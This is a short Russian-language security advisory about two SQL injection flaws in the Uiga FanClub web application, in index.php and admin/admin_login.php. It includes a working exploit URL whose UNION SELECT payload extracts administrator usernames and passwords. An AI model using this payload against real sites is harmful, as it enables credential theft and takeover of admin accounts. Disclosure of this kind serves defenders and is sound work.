Программа: Uiga FanClub

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения.

1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "id" сценарием index.php (когда "view" установлен в "photos").

2) Уязвимость существует из-за недостаточной обработки входных данных в
параметрах "admin_name" и "admin_password" сценарием admin/admin_login.php.

Эксплоит:

www.site.com/Uigafanclub/index.php?view=photos&id=-9999+
Union+Select+1,2,concat(admin_name,0x3a,admin_password),4,5+from+admin—

Оставить мнение